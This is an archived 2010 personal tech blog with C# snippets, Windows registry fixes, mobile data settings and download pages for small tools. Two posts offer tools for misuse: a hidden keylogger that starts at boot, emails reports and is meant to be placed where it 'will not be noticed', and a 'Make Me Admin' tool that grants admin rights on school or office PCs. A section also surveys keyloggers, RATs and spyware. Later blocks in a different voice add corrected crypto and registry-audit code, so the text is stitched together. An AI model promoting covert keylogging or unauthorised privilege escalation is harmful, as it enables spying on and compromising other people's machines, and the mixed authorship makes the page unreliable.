Sunday, March 28, 2010

Personal KeyLogger


NOTE :- This article and software are for personal use only! Please do not use it for stealing information or for hacking activities.
Hello everyone, I'm back with another small tool. Many of us want to know what happens on our own system while we are away from it. There are many programs for this on the internet, but many of them are shareware or infected with viruses.
As you all know I'm a C# addict and love writing small applications in C#, so I developed a small application that records the keystrokes typed on the system it runs on.
It is a small keylogger that logs the time, the application and the keystrokes pressed while the user works in a particular application.
It's small, but powerful and user friendly.

Main Features :-
  • User Friendly Interface
  • Password Protection
  • Email Reports Function
  • Runs Automatically on System Startup
  • Running in Hidden Mode
  • Unique HotKey - Ctrl+K
  • Portable - Means no installation needed
  • Last but not least it's freeware
PREREQUISITE : -
Make sure the .NET Framework 2.0 runtime is installed (Windows Vista and Windows 7 users don't need it, as the runtime is already included in Windows).
USAGE : -
Copy the application to a location where it will not be noticed (e.g. C:\Windows) and run it.
It then hides itself automatically and keeps running in the background.
To bring the interface back on screen, press the hotkey Ctrl+K and enter the default password, 1234 (you can change it at any time).
Enjoy, and let me know whether it works for you!


DOWNLOAD sys activity.rar APPLICATION (extract it using WinRAR)

DOWNLOAD DOTNET FRAMEWORK 2.0 RUNTIME (prerequisite)

I'll soon make it run without the .NET Framework.

Cheers..............

Sunday, March 21, 2010

(Specially for NIIT students)
Many of us try to get admin rights on school, college or office PCs, but normally you have to log in with an admin account for that.
What can you do if you only have a limited account and want admin rights?
Don't worry, I have a solution for that and wrote a small application in C#.

All you have to do is run the application and click the MAKE ME ADMIN button. That's it!
The next time a user with admin rights logs in to that computer, your limited user account is automatically given admin rights.
100% working.

DOWNLOAD MAKE ME ADMIN
(Dotnet Framework 2.0 needed to run this application)

Thursday, March 18, 2010

SDMS Project for students
A simple and attractive school management system project created in C# with SQL Server 2005 as the backend database, with all the source code.

Don't forget to run the SQL scripts before starting the main application!
The SQL scripts are included in the source project.
Download sourceProject VS2008
Download sample exe application

Enjoy.................

Many applications, in any language, need basic shutdown, restart and logoff functionality. I have also written applications in C# that need shutdown, restart or logoff commands, but it took me a long time to find a small piece of code to do the trick!

So here is the smallest code to perform these system operations, to save your precious time. It simply launches the built-in shutdown.exe with the right switches:

To Shutdown - System.Diagnostics.Process.Start("shutdown", "/s /t 30");

To Restart - System.Diagnostics.Process.Start("shutdown", "/r /t 30");

To Logoff - System.Diagnostics.Process.Start("shutdown", "/l");

In the first two snippets, 30 is the delay in seconds before the shutdown or restart happens; you can increase or decrease it according to your application. The logoff switch /l does not take a /t delay and logs off the current user immediately. A pending shutdown or restart can be cancelled during the delay with shutdown /a.

Enjoy !

Download Demo Application
Download DemoScr VS2008 project

Tuesday, March 16, 2010

ReadyBoost - Using Your USB Key to Speed Up Windows 7


One very cool feature of Windows 7, especially for machines without the horsepower to fully enjoy the rich visuals of Windows Presentation Foundation (Avalon) applications, is ReadyBoost. ReadyBoost lets you plug a USB key into your machine and have Windows 7 use it as a disk cache that supplements RAM. I had heard of it and tried it myself; when a reader emailed me asking whether this was an urban legend, I decided to check it out properly and was impressed with how easy and seamless the process is.

Configuring a USB Mass Storage Device as a ReadyBoost Cache

First I took a standard USB 2.0 key (I'll list the prerequisites shortly) and plugged it into my machine, which runs Windows 7 Ultimate. On plugging the key in, I was greeted with the standard AutoPlay dialog box asking how I wanted the operating system to treat it.

> First of all, format the pen drive with the exFAT or NTFS option.
> Now go to My Computer, right-click the USB drive or SD (Secure Digital) memory card and select Properties.
> Select the ReadyBoost tab and click "Use this device".
> Increase the "Space to reserve for system speed".
> Click Apply and then OK.

That's it!
Enjoy the new speed of your system...

Things to Know About ReadyBoost :-

If you have a USB key configured for ReadyBoost and then insert a second key, Windows 7 will display the Properties dialog box where you'll see the message on the Memory tab.
While ReadyBoost works with other devices, such as SD cards, CompactFlash, etc., I've only used it with a USB key. Here are the baseline requirements the team gave me for what ReadyBoost will work with:

  • The USB key must be at least USB 2.0
  • The USB key has to have at least 64 MB of free space

Update: Due to so many questions about this feature, I've tracked down the Program Manager (owner) of this feature, Matt Ayers. Matt has put together a complete ReadyBoost FAQ that I've posted in a separate blog entry. Feel free to leave comments here.

Sunday, March 14, 2010

LOVE METER

Cricket

CHESS

TIC - TAC - TOE

Arrange Numbers

Yohoho Cannon

Bombardment

Hey everyone, I'm using Windows 7 and I like its feature of changing the desktop wallpaper automatically.
That's why I created this small application to change your desktop wallpaper automatically, with the pictures and time interval of your choice!

Hope you all like it!
It's very user friendly.

Download AutowallpaperChanger

Thursday, March 11, 2010

EXE - DLL MERGER


A small application to merge several .NET exe and dll files into a single exe!
It uses ILMerge to do the actual merge.

Download Merger.rar (contains two files, ILMerge.exe and Merger.exe)

Just download and extract the files using WinRAR and run the Merger.exe application!

Note: ILMerge.exe and Merger.exe must be in the same folder.

Enjoy !
Please leave comments...........

Wednesday, March 10, 2010

A small application to hide and protect your private folders!

User friendly interface
You can password protect it

Download Folder Hider

Download Dotnet framework 2.0(needed if not installed in your system)

A small animated fish for your desktop!


Download Animated Fish

Download Dotnet Framework 2.0

A small application that can easily block and unblock websites!

You can even password protect it!

Download Websites Blocker (Proxy)

Dotnet Framework 2.0 Needed

Nowadays, because of viruses, many of us face the problem of a disabled Registry Editor, a disabled Task Manager, disabled Folder Options and so on.
That's why I created a small application to fix these problems: Registry Tweaks.

Features : -

  • Disable / Enable Task Manager
  • Easy to use interface
  • Disable / Enable Registry Editor
  • Disable / Enable Folder Options
  • Disable / Enable USB
  • Prevent the user from changing the desktop wallpaper
  • Show hidden files directly (without going through Folder Options)

Download Registry Tweaks

Dotnet Framework 2.0 Needed To Run This Application

Tuesday, March 9, 2010

We use the System.Security.Cryptography, System.IO and System.Text namespaces to encrypt and decrypt a string.

First of all, add using directives for those three namespaces to your project.
Now declare a global static string variable: private static string sKey = "123abc456efg"; // any string of your choice; it is what you pass as the "key" parameter below

The following method encrypts the string:

protected static string Encrypt(string InputText, string key)
{
    // "key" is your secret key (sent from the front end) and "InputText" is the
    // text to encrypt, e.g. the password sent from the login page.
    // Create an instance of the Rijndael class (AES-compatible with the default 128-bit block).
    RijndaelManaged RijndaelCipher = new RijndaelManaged();
    // First turn the input string into a byte array.
    byte[] PlainText = System.Text.Encoding.Unicode.GetBytes(InputText);
    // This "salt" is only the key length written as ASCII digits. It is neither random
    // nor secret, so it gives none of the protection a real salt gives: the same key
    // always derives the same key and IV bytes, and the same text encrypts to the
    // same ciphertext every time.
    byte[] Salt = Encoding.ASCII.GetBytes(key.Length.ToString());
    // Derive the secret key bytes from the key and salt. PasswordDeriveBytes is a
    // legacy, non-standard PBKDF1 extension; Rfc2898DeriveBytes (PBKDF2) is the
    // supported replacement in newer code.
    PasswordDeriveBytes SecretKey = new PasswordDeriveBytes(key, Salt);
    // Create an encryptor from the derived bytes: 16 bytes (128 bits) for the key
    // and 16 bytes for the IV (Rijndael's block size is 128 bits = 16 bytes).
    ICryptoTransform Encryptor = RijndaelCipher.CreateEncryptor(SecretKey.GetBytes(16), SecretKey.GetBytes(16));
    // A MemoryStream to hold the encrypted bytes.
    MemoryStream memoryStream = new MemoryStream();
    // A CryptoStream through which the data is processed. CryptoStreamMode.Write means
    // we write plaintext into it and the encrypted output lands in the MemoryStream.
    // (Always use Write mode for encryption.)
    CryptoStream cryptoStream = new CryptoStream(memoryStream, Encryptor, CryptoStreamMode.Write);
    // Start the encryption.
    cryptoStream.Write(PlainText, 0, PlainText.Length);
    // Finish encrypting (writes the final, padded block).
    cryptoStream.FlushFinalBlock();
    // Copy the encrypted data out of the MemoryStream.
    byte[] CipherBytes = memoryStream.ToArray();
    // Close both streams.
    memoryStream.Close();
    cryptoStream.Close();
    // Convert the encrypted bytes into a Base64 string. A common mistake is to use an
    // Encoding class for this; it does not work, because not all byte values can be
    // represented by characters. Base64 is designed for exactly this.
    string EncryptedData = Convert.ToBase64String(CipherBytes);
    // Return the encrypted string.
    return EncryptedData;
}

The following method decrypts the string:

protected static string Decrypt(string InputText, string key)
{
    RijndaelManaged RijndaelCipher = new RijndaelManaged();
    byte[] EncryptedData = Convert.FromBase64String(InputText);
    // The same (non-random) salt and derivation as in Encrypt, so the same key and IV come out.
    byte[] Salt = Encoding.ASCII.GetBytes(key.Length.ToString());
    PasswordDeriveBytes SecretKey = new PasswordDeriveBytes(key, Salt);
    // Create a decryptor from the derived bytes.
    ICryptoTransform Decryptor = RijndaelCipher.CreateDecryptor(SecretKey.GetBytes(16), SecretKey.GetBytes(16));
    MemoryStream memoryStream = new MemoryStream(EncryptedData);
    // Create a CryptoStream (always use Read mode for decryption).
    CryptoStream cryptoStream = new CryptoStream(memoryStream, Decryptor, CryptoStreamMode.Read);
    // We don't know the decrypted size in advance, so allocate a buffer as large as
    // EncryptedData; the plaintext is never longer than the ciphertext.
    byte[] PlainText = new byte[EncryptedData.Length];
    // Decrypt. A wrong key, or ciphertext that was modified or truncated, throws
    // CryptographicException here (typically a padding error). Let it propagate and
    // handle it in the caller. Do not catch it and return exception.Message as the
    // result: the caller could then not tell an error text from real decrypted data.
    int DecryptedCount = cryptoStream.Read(PlainText, 0, PlainText.Length);
    memoryStream.Close();
    cryptoStream.Close();
    // Convert the decrypted bytes back into a string.
    string DecryptedData = Encoding.Unicode.GetString(PlainText, 0, DecryptedCount);
    // Return the decrypted string.
    return DecryptedData;
}
 
 
That's it!
 
Download Demo Application

Download Demo SrcCode VS2008
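The Encrypt/Decrypt pair above has three weaknesses worth knowing about before reusing it: the salt is just the key length, so the same key always yields the same key and IV bytes and the same text always encrypts to the same ciphertext; nothing authenticates the ciphertext, so a modified message decrypts to garbage (or to a padding error that tells an attacker whether the padding was valid) instead of being rejected; and a catch-all that returns the exception message hands error text back as if it were plaintext. The following is an added example, not the original post's code, that keeps the same string-in, Base64-out shape but uses PBKDF2 (Rfc2898DeriveBytes) with a random salt, a random IV stored next to the ciphertext, and an HMAC-SHA256 tag that is checked before anything is decrypted. It assumes .NET Framework 4.0 or later (Aes.Create, and IDisposable on the KDF and RNG classes); the class name, the size constants and the 100000 iteration count are choices made here, not anything from the post.

```csharp
// Added example: password-based encryption with a random salt, PBKDF2, a random IV
// and an HMAC-SHA256 tag. Not the original post's code. Assumes .NET Framework 4.0+.
using System;
using System.Security.Cryptography;
using System.Text;

public static class PasswordCrypto
{
    const int SaltSize = 16;       // random salt, stored with the message
    const int IvSize = 16;         // AES block size
    const int KeySize = 32;        // AES-256 key; a second 32 bytes becomes the MAC key
    const int TagSize = 32;        // HMAC-SHA256 output
    const int Iterations = 100000; // PBKDF2 work factor (assumed value); raise as hardware allows

    // PBKDF2 with a per-message random salt, giving separate encryption and MAC keys.
    static void DeriveKeys(string password, byte[] salt, out byte[] encKey, out byte[] macKey)
    {
        using (var kdf = new Rfc2898DeriveBytes(password, salt, Iterations))
        {
            encKey = kdf.GetBytes(KeySize);
            macKey = kdf.GetBytes(KeySize);
        }
    }

    // Output layout (Base64): salt || iv || ciphertext || tag,
    // where tag = HMAC-SHA256(macKey, salt || iv || ciphertext).
    public static string Encrypt(string plaintext, string password)
    {
        byte[] salt = new byte[SaltSize];
        byte[] iv = new byte[IvSize];
        using (var rng = RandomNumberGenerator.Create())
        {
            rng.GetBytes(salt);
            rng.GetBytes(iv); // fresh IV per message: equal plaintexts no longer give equal ciphertexts
        }
        byte[] encKey, macKey;
        DeriveKeys(password, salt, out encKey, out macKey);

        byte[] ciphertext;
        using (var aes = Aes.Create())
        using (ICryptoTransform enc = aes.CreateEncryptor(encKey, iv)) // CBC + PKCS7 by default
        {
            byte[] input = Encoding.UTF8.GetBytes(plaintext);
            ciphertext = enc.TransformFinalBlock(input, 0, input.Length);
        }

        int headerLen = SaltSize + IvSize + ciphertext.Length;
        byte[] output = new byte[headerLen + TagSize];
        Buffer.BlockCopy(salt, 0, output, 0, SaltSize);
        Buffer.BlockCopy(iv, 0, output, SaltSize, IvSize);
        Buffer.BlockCopy(ciphertext, 0, output, SaltSize + IvSize, ciphertext.Length);
        using (var hmac = new HMACSHA256(macKey))
        {
            byte[] tag = hmac.ComputeHash(output, 0, headerLen);
            Buffer.BlockCopy(tag, 0, output, headerLen, TagSize);
        }
        return Convert.ToBase64String(output);
    }

    // Throws CryptographicException on a wrong password, a truncated message or a
    // modified byte. It never hands an error message back as if it were plaintext.
    public static string Decrypt(string encoded, string password)
    {
        byte[] blob = Convert.FromBase64String(encoded);
        if (blob.Length < SaltSize + IvSize + TagSize)
            throw new CryptographicException("Message too short.");
        int ctLen = blob.Length - SaltSize - IvSize - TagSize;
        int headerLen = SaltSize + IvSize + ctLen;

        byte[] salt = new byte[SaltSize];
        byte[] iv = new byte[IvSize];
        Buffer.BlockCopy(blob, 0, salt, 0, SaltSize);
        Buffer.BlockCopy(blob, SaltSize, iv, 0, IvSize);
        byte[] encKey, macKey;
        DeriveKeys(password, salt, out encKey, out macKey);

        // Verify the tag before decrypting, comparing every byte (no early exit).
        byte[] expected;
        using (var hmac = new HMACSHA256(macKey))
            expected = hmac.ComputeHash(blob, 0, headerLen);
        int diff = 0;
        for (int i = 0; i < TagSize; i++)
            diff |= expected[i] ^ blob[headerLen + i];
        if (diff != 0)
            throw new CryptographicException("Authentication failed.");

        using (var aes = Aes.Create())
        using (ICryptoTransform dec = aes.CreateDecryptor(encKey, iv))
        {
            return Encoding.UTF8.GetString(dec.TransformFinalBlock(blob, SaltSize + IvSize, ctLen));
        }
    }

    public static void Main()
    {
        string secret = Encrypt("hello from the login page", "123abc456efg");
        Console.WriteLine(Decrypt(secret, "123abc456efg"));          // round trip
        try { Decrypt(secret, "wrong password"); }
        catch (CryptographicException e) { Console.WriteLine("rejected: " + e.Message); }
    }
}
```

The MAC is computed over the salt and IV as well as the ciphertext, so an attacker cannot swap those either, and it is verified before the first block is decrypted, which is what keeps padding errors from ever being reachable with a forged message.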

Monday, March 8, 2010

Airtel has recently rolled out a new GPRS pack that is very competitive with the GPRS packs offered by newer providers like Docomo. With the new plan the user gets unlimited browsing for the whole month for just Rs.98. Though Airtel calls it "unlimited", it comes with a fair usage policy limit of 2 GB. If you use GPRS only on a mobile device, 2 GB is more than enough for a month. If you connect your laptop or PC to browse the internet, then you should be counting those bits!

To get this plan, just Easy Recharge with Rs.98. But before that, activate Mobile Office on your number: dial *567*11# and you will get a confirmation message. Dialing this activates the basic Mobile Office plan, which is 30 paise per 50 KB, pay as you browse. After you E-Recharge with Rs.98 it overrides the basic plan and you get 2 GB of free browsing. It's instant.
If you don't have the settings, send ALL to 543210.

To check your usage details and the expiry date of the pack, dial *123*10#.


I provide these settings because China Mobile customer care doesn't send any settings through SMS.
The only way is to enter them manually, and the menus on China Mobile phones are quite complicated, so here are the Mobile Office, Airtel Live and Airtel MMS settings for all China mobiles ==>

1) Mobile Office

First click the SERVICES icon in the main menu ==> DATA ACCOUNT ==> GPRS ==> EDIT any existing account ==>
Account Name --> MO
APN --> airtelgprs.com
Auth. Type --> Normal

Save all the settings.

Come back to SERVICES ==> WAP ==> SETTINGS ==> EDIT PROFILE ==> EDIT any existing account ==>
Rename Profile ==> Mobile Office
Homepage ==> Google
Data account ==> MO (which we created previously)
Connection Type ==>

Here you will find three options:
a) Connection-oriented
b) Connectionless
c) HTTP

Choose a) Connection-oriented ==>
IP Address ==> 202.056.231.117
Security ==> off
Again save all the settings, click the BACK button and choose "Activate Profile".
Come back to SERVICES ==> WAP ==> Homepage

and you are ready to use Mobile Office...

2) Airtel Live
First click the SERVICES icon in the main menu ==> DATA ACCOUNT ==> GPRS ==> EDIT any existing account ==>
Account Name --> LIVE
APN --> airtelfun.com
Auth. Type --> Normal
Save all the settings.

Come back to SERVICES ==> WAP ==> SETTINGS ==> EDIT PROFILE ==> EDIT any existing account ==>
Rename Profile ==> Airtel Live
Homepage ==> http://live.airtelworld.com
Data account ==> LIVE (which we created previously)
Connection Type ==>

Here you will find three options:
a) Connection-oriented
b) Connectionless
c) HTTP
Choose c) HTTP ==>
Proxy Address ==> 100.001.200.099
Proxy Port ==> 8080
Again save all the settings, click the BACK button and choose "Activate Profile".
Come back to SERVICES ==> WAP ==> Homepage
and you are ready to use Airtel Live...


3) Airtel MMS

First click the SERVICES icon in the main menu ==> DATA ACCOUNT ==> GPRS ==> EDIT any existing account ==>
Account Name --> MMS
APN --> airtelmms.com
Auth. Type --> Normal
Save all the settings.
Come back to SERVICES ==> WAP ==> SETTINGS ==> EDIT PROFILE ==> EDIT any existing account ==>
Rename Profile ==> Airtel MMS
Homepage ==> http://100.1.201.171:10021/mmsc
Data account ==> MMS (which we created previously)
Connection Type ==>
Here you will find three options:
a) Connection-oriented
b) Connectionless
c) HTTP
Choose c) HTTP ==>
Proxy Address ==> 100.1.201.172
Proxy Port ==> 8799
Again save all the settings, click the BACK button and choose "Activate Profile".
Come back to SERVICES ==> WAP ==> Homepage
and you are ready to use Airtel MMS...
Enjoy....

Download China PC Suite

Download China Phone Modem Drivers

How To Use : -
Step 1 : First download the two files above and extract them using WinRAR.
Step 2 : Now connect your China phone to your PC or laptop and select the COM PORT option on the phone.
Step 3 : The system will now begin to search for drivers.
Step 4 : Click Next, select the Drivers folder (which you already downloaded) and click Next again; your system will install the drivers for your phone.
Step 5 : Now go to Start > Run, type devmgmt.msc and press ENTER to open Device Manager, and in the Ports list note down your phone's COM port number.

Step 6 : Now open the China PC Suite folder (which you downloaded from the link above) and run the PhoneSuite.exe application.
Step 7 : Click Settings under Connect > Mobile Phone: select your phone (if listed), and under COM Ports select the port you noted in Step 5.

Step 8 : This step creates an internet connection through the China phone. Click Create Connection > click the New / Modify button and enter the details as shown in the following picture,
then click the New button. Now select, for example, Aircel GPRS from the Operators list and click the Create button, and you will see a message like the following:

Click OK. That's it!
You have successfully created a dial-up connection using the China phone.

Step 9 : To connect to the internet, go to Start > Run, type ncpa.cpl to open Network Connections, select the connection you created in Step 8, hit Enter and click Dial.
That's it!
If you have activated internet on your mobile, you will be connected to the internet.
Cheers :-)

Sunday, March 7, 2010

According to the MSDN Library, "the AnimateWindow function enables you to produce special effects when showing or hiding windows". There are four types of animation you can use: roll, slide, collapse/expand, and alpha-blended fade.




AnimateWindow is a Win32 API exported by user32.dll, so from C# we call it through P/Invoke. This is the P/Invoke signature for the AnimateWindow function (the using System.Runtime.InteropServices; declaration is required):

[DllImport("user32.dll")]
static extern bool AnimateWindow(IntPtr hWnd, int time, AnimateWindowFlags flags);



Add this to the top of the “Form1” class.



Notice the "AnimateWindowFlags" parameter. This is a user-defined type, so for this code to compile you must add this enum to your code:

[Flags]
enum AnimateWindowFlags
{
    AW_HOR_POSITIVE = 0x00000001,
    AW_HOR_NEGATIVE = 0x00000002,
    AW_VER_POSITIVE = 0x00000004,
    AW_VER_NEGATIVE = 0x00000008,
    AW_CENTER = 0x00000010,
    AW_HIDE = 0x00010000,
    AW_ACTIVATE = 0x00020000,
    AW_SLIDE = 0x00040000,
    AW_BLEND = 0x00080000
}


These are the possible animation types that you can use. Below is a brief overview of what each flag does.



AW_SLIDE :

Uses slide animation. By default, roll animation is used. This flag is ignored when used with AW_CENTER.

AW_ACTIVATE :

Activates the window. Do not use this value with AW_HIDE.

AW_BLEND :

Uses a fade effect. This flag can be used only if hwnd is a top-level window.

AW_HIDE :

Hides the window. By default, the window is shown.

AW_CENTER :

Makes the window appear to collapse inward if AW_HIDE is used or expand outward if the AW_HIDE is not used. The various direction flags have no effect.

AW_HOR_POSITIVE :

Animates the window from left to right. This flag can be used with roll or slide animation. It is ignored when used with AW_CENTER or AW_BLEND.

AW_HOR_NEGATIVE :

Animates the window from right to left. This flag can be used with roll or slide animation. It is ignored when used with AW_CENTER or AW_BLEND.

AW_VER_POSITIVE :

Animates the window from top to bottom. This flag can be used with roll or slide animation. It is ignored when used with AW_CENTER or AW_BLEND.

AW_VER_NEGATIVE :

Animates the window from bottom to top. This flag can be used with roll or slide animation. It is ignored when used with AW_CENTER or AW_BLEND.

Animating a Window

Now that we have the AnimateWindow function setup, let’s animate a window.

First, we need to create a load event handler for our form.

Inside of the form’s load event handler, add this code:

AnimateWindow(this.Handle, 500, AnimateWindowFlags.AW_BLEND);

Build and run your code. When the application starts, you should see the form fade in. Try other values for the "time" parameter and the "AnimateWindowFlags" parameter; the higher the time value, the slower the animation runs.



Download Demo Application
Download Src Code VS2008

That’s it!
Enjoy !

First of all include the System.Drawing, System.Drawing.Imaging and System.Windows.Forms namespaces in your project (Bitmap and Graphics live in System.Drawing, PixelFormat in System.Drawing.Imaging, and Screen in System.Windows.Forms).
The following method returns a bitmap image of the primary screen:

public Bitmap ScreenShot()
{
    Rectangle bounds = Screen.PrimaryScreen.Bounds;
    Bitmap screenShotBMP = new Bitmap(bounds.Width, bounds.Height, PixelFormat.Format32bppArgb);
    // Graphics holds a GDI handle; dispose it as soon as the pixels are copied.
    using (Graphics screenShotGraphics = Graphics.FromImage(screenShotBMP))
    {
        screenShotGraphics.CopyFromScreen(bounds.X, bounds.Y, 0, 0, bounds.Size,
            CopyPixelOperation.SourceCopy);
    }
    return screenShotBMP;
}
 


Download Demo Application

Download VS2008 Project Scr Code

That's It !
Enjoy !

If Search opens when you double-click a folder in Windows Explorer, see the fix below:

We need to repair a registry entry for the Windows shell that has been damaged by a virus. Follow the steps below:

1. Open Start >> Run or press Windows Key + R; this opens the Run prompt.

2. Type "regedit" (without quotes) and press Enter.

3. Navigate to the key

HKEY_CLASSES_ROOT\Directory\shell

4. Double-click the (Default) value and set its value to none.

This restores the normal Windows Explorer behaviour of opening a folder when you double-click it, rather than opening Windows Search.

If Search opens when you double-click a drive, then try this:

1. Open Start >> Run or press Windows Key + R.

2. Type "regsvr32 /i shell32.dll" (without quotes) and press Enter.

After the command runs successfully, you will see a message saying DllRegisterServer and DllInstall in Shell32.dll succeeded.

We hope this helps to fix the trouble.

Follow the steps:

CTRL + ALT + DEL
Start Task Manager
Applications tab
New task
type explorer & press ENTER

Have they now returned?

Do they disappear the next time you reboot? If so, explorer.exe is missing from the Shell string under the Winlogon registry key.

START
RUN
Type regedit & press ENTER

Navigate to:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

In the right pane is the Shell string I mentioned above. It should read like this:

Shell REG_SZ explorer.exe

Close the registry editor.

In short, the proposed action plan that worked for him and seems to be working for me follows. Jay

I read many posts related to the topic and eventually did the following:

1. booted up to Windows
2. ctrl+alt+del to get Windows Task Manager
3. File, new task, typed regedit, clicked OK
4. go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
5. In there I had an explorer.exe folder that I deleted (you may have an entry in the root of the Image File folder as well.. delete them also).
6. Rebooted and everything was back to normal.
7. Breathed a sigh of relief.

You can back up the explorer.exe folder (and files in the Image File Execution Options root if applicable) by exporting them before the deletion process.

Hopefully this thread will save many people lots of time in the future.
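The two registry locations the thread above edits by hand are classic hijack points: the Winlogon Shell value decides what runs as the desktop after logon, and an Image File Execution Options (IFEO) subkey with a Debugger value makes Windows start that "debugger" instead of the named program, which is how explorer.exe, taskmgr.exe or regedit.exe get silently replaced. The following is an added example, not code from the post or the thread, that reads both locations and reports anything that is not the stock value. It only needs Microsoft.Win32 from the .NET Framework; the class name and the "looks stock" rule are choices made here.

```csharp
// Added example: a read-only audit of the Winlogon Shell value and of IFEO
// Debugger entries. Not code from the original post. Reading HKLM needs no
// elevation; deleting a key (as the thread does) needs an administrator.
using System;
using System.Collections.Generic;
using Microsoft.Win32;

public static class ShellHijackCheck
{
    const string WinlogonPath = @"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon";
    const string IfeoPath = @"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options";

    // The Shell value Winlogon launches after logon; null if the value is missing.
    public static string ReadShell()
    {
        using (RegistryKey key = Registry.LocalMachine.OpenSubKey(WinlogonPath))
        {
            return key == null ? null : key.GetValue("Shell") as string;
        }
    }

    // True only for the stock value. A second comma-separated program, or a path
    // into a user or temp directory, is the persistence trick the thread describes.
    public static bool ShellLooksStock(string shell)
    {
        return shell != null &&
               string.Equals(shell.Trim(), "explorer.exe", StringComparison.OrdinalIgnoreCase);
    }

    // Every IFEO subkey carrying a Debugger value, paired with that value.
    public static List<KeyValuePair<string, string>> FindDebuggerEntries()
    {
        var hits = new List<KeyValuePair<string, string>>();
        using (RegistryKey ifeo = Registry.LocalMachine.OpenSubKey(IfeoPath))
        {
            if (ifeo == null) return hits;
            foreach (string image in ifeo.GetSubKeyNames())
            {
                using (RegistryKey sub = ifeo.OpenSubKey(image))
                {
                    string debugger = sub == null ? null : sub.GetValue("Debugger") as string;
                    if (!string.IsNullOrEmpty(debugger))
                        hits.Add(new KeyValuePair<string, string>(image, debugger));
                }
            }
        }
        return hits;
    }

    public static void Main()
    {
        string shell = ReadShell();
        Console.WriteLine("Winlogon Shell = " + (shell ?? "<missing>") +
                          (ShellLooksStock(shell) ? "  [ok]" : "  [check this]"));
        foreach (KeyValuePair<string, string> hit in FindDebuggerEntries())
            Console.WriteLine("IFEO " + hit.Key + " -> Debugger = " + hit.Value);
    }
}
```

A Debugger value is not proof of infection on its own (developers set one to attach a debugger when a program starts), but one on explorer.exe pointing at an unfamiliar file is exactly what the steps above remove. Export the key before deleting it, as the post says, so a false positive can be undone.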

This is a very common problem for Windows users: many times, for no obvious reason, CPU usage shoots up to 100% and a process named Explorer.exe starts consuming a lot of CPU and memory.

This makes the system very slow to respond, and it takes a long time to launch an application.

The problem has no single definite fix, but here is a list of steps you can try.

Steps:

1. First of all, make sure your system is free of viruses and malware. Use a good, up-to-date antivirus together with Malwarebytes Anti-Malware (MBAM).

2. This problem has also been traced to broken AVI files and missing codecs, which make Explorer's AVI property handler (the CLSID below) choke while reading the file's metadata. Open the Registry Editor (type regedit in Run), export the key first so you can restore it, and then remove the following key:

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{87D62D94-71B3-4b9a-9489-5FE6850DC73E}\InProcServer32

Also change the default value of the key HKEY_CLASSES_ROOT\SystemFileAssociations\.avi\shellex\PropertyHandler from "{87D62D94-71B3-4b9a-9489-5FE6850DC73E}" to 0.

3. We need to make some changes in Explorer itself. Go to Folder Options -> View tab and make sure that "Automatically search for network folders and printers" is unchecked and "Launch folder windows in a separate process" is checked. Apply.

4. Unregistering the Compressed (zipped) Folders shell extension also fixes this sometimes. Type regsvr32 /u C:\windows\system32\zipfldr.dll in the Run box.

A reboot may be required.

Hacker tools are programs written to access a computer system using known software vulnerabilities. Most of these programs are written and freely distributed from "hacker" websites. Some of them were written for legitimate uses and are abused as hacking tools.




======================================================================
Key loggers, as the name suggests, are programs that record keystrokes from the keyboard and either log them on the computer or send them to their operator through a built-in e-mail engine. Key logging lets an attacker obtain the user names, passwords and even ID numbers typed into online bank accounts, or the passwords to remote control programs. Listed below are the top 9 key loggers reported.


======================================================================
RATs are remote administration tools that have been planted on an unsuspecting victim's computer. They are the most dangerous of all hacking tools, as they allow complete control of the infected computer.


======================================================================
Spyware, as the name suggests, is software planted on a computer that records passwords, Internet visits and cookies, and can sometimes control system services and remotely execute commands. Spyware is becoming more popular as husbands and wives become more concerned about their spouse's Internet activity. Many programs offered on the Internet for free contain hidden Trojans with spyware embedded in them. Remember, nothing is really as free as it seems; there is always a hidden price. Listed below are 10 of the most common spyware programs:


======================================================================
Cookies store information about websites a person has visited, sometimes including a username and password. Careful users configure their browser not to accept cookies, but some sites demand them, and people give up security for convenience. Listed below are ten cookie spyware programs.


======================================================================
Trojans are hidden programs disguised within another program. They are the largest example of "freeware" software with another agenda. Most freeware is perfectly legitimate and is contributed by its author with good intentions, but there is other "freeware" in the mix that is distributed, intentionally or unintentionally, for the sole purpose of gaining access to your computer system. Sadly, paranoia is the safest bet if you want to keep out intruders, and even that is not always effective against programs that enter on their own. Below are 10 of the most common Trojan programs of 2003.


======================================================================
Many worms use Microsoft Outlook or Outlook Express to propagate. These e-mail worms carry an attached file that has to be opened to install them. The file typically has a double extension, such as NAME.BMP.EXE or NAME.TXT.VBS: with "hide extensions for known file types" turned on, Explorer hides the final extension and shows only the harmless-looking NAME.BMP, while the last extension (EXE, VBS, SHS, BAT, CMD or PIF) is what actually runs and installs the program. That program can be a remote control tool, spyware, a key logger or any other software used maliciously.

Other worms exploit buffer overflows and other program vulnerabilities, and need no user action at all.

======================================================================

Buffer Overflow Explained

A buffer overflow happens when more data is written into a buffer (a fixed-size holding area in memory) than it was allocated to hold, so the excess spills over and overwrites adjacent memory. Depending on what that memory holds (other variables, a saved return address), the result ranges from a crash to the attacker running code of their choice, which is how such a bug turns into a back door that gives system access.

======================================================================

1. Click Start, and then click Run.

2. In the Open box, type regedit, and then click OK.

3. Locate and click the following registry key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor

4. In the right pane, double-click Start.

5. In the Value data box, type 4, click Hexadecimal (if it is not already selected), and then click OK.

6. Quit Registry Editor.

7. Restart Windows.

Start = 4 means "disabled"; the default for UsbStor is 3 (start on demand), so set it back to 3 to re-enable USB storage. This only blocks the USB mass storage driver: USB keyboards, mice and other non-storage devices keep working, and any user who can write to that key can undo it.

If this method doesn't work for you, try Device Manager: under Universal Serial Bus controllers you can disable the controllers from there.

If neither of those methods works, go into your computer's BIOS and disable the USB ports.

Useful Windows XP Tips, Tweaks, Walkthroughs and Shortcuts.


1. Total Uptime

XP keeps track of how long it has been running. Open the Command Prompt from the Accessories menu under All Programs, and type 'systeminfo'. The computer will produce a lot of useful info, including the uptime. If you want to keep it, type 'systeminfo > info.txt'. This creates a file called info.txt you can look at later with Notepad.

2. Delete Files Immediately

